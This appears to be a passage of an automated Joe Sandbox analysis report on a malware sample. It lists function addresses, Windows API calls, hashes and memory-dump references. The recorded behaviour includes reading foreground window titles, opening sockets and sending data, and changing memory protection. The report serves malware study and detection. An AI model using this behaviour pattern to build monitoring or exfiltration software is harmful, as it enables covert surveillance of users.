                                                                                                                                                                                                                                                                                                                              • API String ID: 1890195054-2766056989
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                                                                                                                                                                                                                              • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                                                                                                                                                                                                                                              Function 0044B9CE Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044B9EF
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(00000000,?,00000000,?,0000000F,?,00431FE7,00000000,0000000F,0042EA4D,?,?,00430AB6,?,00000000), ref: 0044BA2B
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AllocateHeap$_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1482568997-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4ec374b27fdcb4e51bf886fe72aa52163d481902fd3bbe85b5f84076fdb7f7cd
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FF0C23260051166FB216E679C05F6B2B68DF827B0F15412BFD04B6291DF6CC80191ED
                                                                                                                                                                                                                                                                                                                              Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CreateEventStartupsocket
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1953588214-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                                                                                                                                                                                                                                              Function 0043361D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,?,00433E19,00000000,00000000,?,?,?,?,?,?,00433E19,?,0046D5EC), ref: 00437C47
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E14
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3476068407-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 02f9a842f842a715d987613c720c18d86e9d620b05cc95bf3092e1ce2b61825f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a120e58b429b9861eb3006866c51ef53ea309f8249189fce9472b36b7df41f91
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02f9a842f842a715d987613c720c18d86e9d620b05cc95bf3092e1ce2b61825f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFF0243080430D7BCB14BEAAE80799D772C5D08319F60612BB825955E1EF7CE715C58E
                                                                                                                                                                                                                                                                                                                              Function 0041AC62 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0041AC84
                                                                                                                                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC97
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Window$ForegroundText
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 29597999-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: fc9550f23c582834adc74fe767e5a47d1f70ec12f4b2fc4e7e19963045584285
                                                                                                                                                                                                                                                                                                                              • Instruction ID: cc2156d331005380bc7f387210694eb4be3f76427b44d354f8bc4e4bef854abe
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc9550f23c582834adc74fe767e5a47d1f70ec12f4b2fc4e7e19963045584285
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFE04875A0031867FB24A765AD4EFD6766C9704715F0000B9BA19E21C3E9B4EA04C7E4
                                                                                                                                                                                                                                                                                                                              Function 004106D3 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f15b865ef06e6e56f0e3155fe6c262580cd03049418ed3f125d30449dfe24c6e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B11CE72700101AFD6149A18C880BA6B766FF80710F5942AEE115CB292DBB5FCD2CA94
                                                                                                                                                                                                                                                                                                                              Function 00448716 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,00433637,?,?,00402BE9,?,00402629,00000000,?), ref: 00448757
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c0e71c43265bb7a2ed883484c95d5de73dd4aa74b019aeb8b9faa22b7eb24aee
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 28044070be8b550b436e3a89d8ee4c5083ce1cba36f38117670c034d6afde2c5
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0e71c43265bb7a2ed883484c95d5de73dd4aa74b019aeb8b9faa22b7eb24aee
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FF0E03154562467BB217A669D56B5F7744AF41770B34402FFC04A6190CF68D901C2DD
                                                                                                                                                                                                                                                                                                                              Function 00446B0F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9aef8a7b80d5ef8cde78cc1a95e43686bba12cbd10c6cd592e8946dff14ce016
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54E0E5312012B5A7FB202A6A9C05F5B7688DB437A4F060033AC45D66D0CB58EC4181AF
                                                                                                                                                                                                                                                                                                                              Function 10015A9F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: f87b84874486757e2c47ac47ea9f60d9c82a37147b210451a2933aa9f661e901
                                                                                                                                                                                                                                                                                                                              • Instruction ID: def42a02582f0e9aca0d42380fcba57ce1fa30504e24a63dc847fc71142e9800
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f87b84874486757e2c47ac47ea9f60d9c82a37147b210451a2933aa9f661e901
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBE06535281221E6E721F6A69D85B4B3698DF416F2F6B0220ED149E490DB73DC8182E2
                                                                                                                                                                                                                                                                                                                              Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Startup
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 724789610-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                                                                                                                                                                                                              • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                                                                                                                                                                                                                                              Function 0042611E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: send
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                                                                                                                                                                                                                                              Function 0040262E Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Deallocate
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1075933841-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                                                                                                                                                                                                                                                              Function 10007DE0 Relevance: 1.3, APIs: 1, Instructions: 28sleepCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007E20: FindFirstFileW.KERNEL32(?,?,?,00000000,76230F00), ref: 10007ED1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007E20: FindNextFileW.KERNELBASE(00000000,?,?,00000000,76230F00), ref: 10007F0A
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 10007E03
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
